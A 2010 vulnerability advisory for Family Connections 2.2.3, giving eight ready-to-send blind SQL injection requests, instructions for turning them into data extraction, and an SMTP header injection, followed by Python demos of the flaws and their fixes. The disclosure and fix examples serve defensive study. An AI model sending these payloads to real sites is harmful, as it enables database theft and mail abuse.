Family Connections 2.2.3 Multiple Remote Vulnerabilities

Name              Family Connections
Vendor            http://www.familycms.com
Versions Affected 2.2.3
Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2010-10-05

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX

I. ABOUT THE APPLICATION

Family Connections is a PHP content management system for family websites, distributed from familycms.com.

II. DESCRIPTION

Several request parameters are not properly sanitised before they are used in SQL statements and in the headers passed to mail().

III. ANALYSIS

Summary:
A) Multiple Blind SQL Injection
B) Multiple SMTP (e-mail header) Injection

A) Multiple Blind SQL Injection

All numeric fields that I tested are vulnerable to time-based blind SQL injection. The bugs exist because the numeric fields are placed unquoted into the SQL statements and are never validated as integers. Since there is no surrounding quote to escape, no quote character is needed: appending "OR <condition>" to the value is enough to alter the query. The sample requests below wrap the condition in IF(<condition>,BENCHMARK(999999999,NULL),NULL), so a true condition measurably delays the response and the response time becomes the oracle.

B) Multiple SMTP Injection

The parameters passed to the PHP mail() function are not properly sanitised. A CR/LF sequence (%0d%0a in a URL-encoded request body) inside one of them terminates the current header line, which allows an attacker to inject arbitrary SMTP/e-mail headers into the generated message, for example additional recipients.

IV. SAMPLE CODE

A) Multiple Blind SQL Injection

POST /path/recipes.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/gallery/upload.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

category=(SELECT(IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)))


POST /path/addressbook.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

editsubmit=1&aid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/addressbook.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

editsubmit=1&uid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/calendar.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

edit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/calendar.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/familynews.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

submitedit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/familynews.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)

Notes on the requests: every request carries a PHPSESSID cookie, so a valid logged-in session is assumed. The bodies are shown unencoded for readability and the Content-Length values match the unencoded bodies; when sending them, URL-encode the spaces (%20 or +) and adjust the length accordingly. The condition ASCII(0x41) = 65 is always true, so it only confirms that the server stalls on the injected BENCHMARK(); to extract data, replace it with a condition on the data of interest, for example ASCII(SUBSTRING(user(),1,1)) = 114, and compare response times.

V. FIX

No fix.
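The following is an added example and is not code from Family Connections or from the advisory; it reproduces in Python, with an in-memory sqlite3 table, the defect the analysis describes in section III.A (a numeric field interpolated unquoted into a query) next to a hardened form that validates the integer and binds it. The table name, rows and function names are constructed for the demo; MySQL's BENCHMARK() is not available in sqlite3, so the time-based probe is only built as a string in the shape the sample requests use, not executed.

```python
"""
Added example (not Family Connections code): unquoted numeric field vs. an
integer-validated bound parameter, plus a builder for the advisory's
time-based probe string.
"""
import sqlite3


def fresh_db() -> sqlite3.Connection:
    # Constructed sample data standing in for a recipes table; not the real schema.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE recipes (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO recipes VALUES (?, ?)",
                    [(1, "Lasagna"), (2, "Borscht"), (3, "Pho")])
    con.commit()
    return con


def delete_recipe_vulnerable(con: sqlite3.Connection, user_id: str) -> int:
    # The advisory's pattern: the value lands unquoted in the statement, so
    # "-1 OR 1=1" needs no quote character to change the WHERE clause.
    cur = con.execute(f"DELETE FROM recipes WHERE id = {user_id}")
    con.commit()
    return cur.rowcount


def delete_recipe_fixed(con: sqlite3.Connection, user_id: str) -> int:
    # Hardened form: accept only a plain integer, then bind it as a parameter.
    try:
        rid = int(user_id)
    except ValueError:
        raise ValueError("id must be an integer")
    cur = con.execute("DELETE FROM recipes WHERE id = ?", (rid,))
    con.commit()
    return cur.rowcount


def remaining(con: sqlite3.Connection) -> int:
    return con.execute("SELECT COUNT(*) FROM recipes").fetchone()[0]


def blind_payload(param: str, condition: str, iterations: int = 999999999) -> str:
    """Builds a MySQL time-based probe in the shape of the advisory's requests.
    `condition` is any MySQL boolean, e.g. "ASCII(SUBSTRING(user(),1,1)) = 114";
    BENCHMARK() runs only when it is true, so response time is the oracle.
    Built as a string only: sqlite3 has no BENCHMARK()."""
    return f"{param}=-1 OR IF({condition},BENCHMARK({iterations},NULL),NULL)"


def sqli_demo() -> dict:
    vuln = fresh_db()
    # Constructed attacker value: matches every row instead of one id.
    wiped = delete_recipe_vulnerable(vuln, "-1 OR 1=1")
    fixed = fresh_db()
    try:
        delete_recipe_fixed(fixed, "-1 OR 1=1")
        rejected = False
    except ValueError:
        rejected = True
    return {
        "rows_deleted_by_injection": wiped,
        "rows_left_vulnerable": remaining(vuln),
        "injection_rejected_by_fix": rejected,
        "rows_left_fixed": remaining(fixed),
    }


if __name__ == "__main__":
    print(sqli_demo())
    print(blind_payload("id", "ASCII(0x41) = 65"))
```

The integer cast is the minimal fix for the pages listed above; a prepared statement with the value bound is what keeps the fix from depending on every caller remembering the cast.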
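The advisory gives no sample request for the SMTP injection in section III.B, so the following added example (not code from Family Connections or from the advisory) shows in Python what happens when a value containing CR/LF is concatenated into the extra-headers argument of PHP's mail(), and a check that rejects such values. The addresses, the injected Bcc header and the function names are constructed for the demo; the header block is parsed the way a mail transfer agent would split it, one header per CRLF.

```python
"""
Added example (not Family Connections code): CR/LF in a mail() header value
becomes an attacker-chosen header; the hardened builder refuses such values.
"""
import re

CRLF_RE = re.compile(r"[\r\n]")


def build_headers_vulnerable(from_addr: str, reply_to: str) -> str:
    # Equivalent of PHP's  $headers = "From: $from\r\nReply-To: $reply\r\n";
    # followed by mail($to, $subject, $body, $headers): values are used as-is.
    return f"From: {from_addr}\r\nReply-To: {reply_to}\r\n"


def parse_headers(block: str) -> dict:
    """Splits a header block into {lowercased name: [values]} on CRLF, which is
    how the MTA sees whatever mail() passed along."""
    headers: dict = {}
    for line in block.split("\r\n"):
        if not line:
            continue
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def build_headers_fixed(from_addr: str, reply_to: str) -> str:
    # Hardened form: a single header value can never legitimately contain CR
    # or LF, so reject the request instead of stripping (stripping silently
    # changes what the user sent and is easy to get subtly wrong).
    for field, value in (("From", from_addr), ("Reply-To", reply_to)):
        if CRLF_RE.search(value):
            raise ValueError(f"newline in {field} header value")
    return f"From: {from_addr}\r\nReply-To: {reply_to}\r\n"


def header_demo() -> dict:
    # Constructed attacker input: a valid-looking address, then CRLF
    # (%0d%0a in a URL-encoded POST body) and an extra Bcc header.
    hostile = "alice@example.invalid\r\nBcc: spam-target@example.invalid"
    parsed = parse_headers(build_headers_vulnerable(hostile, "bob@example.invalid"))
    try:
        build_headers_fixed(hostile, "bob@example.invalid")
        rejected = False
    except ValueError:
        rejected = True
    return {"injected_bcc": parsed.get("bcc", []), "rejected_by_fix": rejected}


if __name__ == "__main__":
    print(header_demo())
```

The same check applies to every value that reaches mail(), including the recipient and subject arguments, since each of them ends up on its own header line.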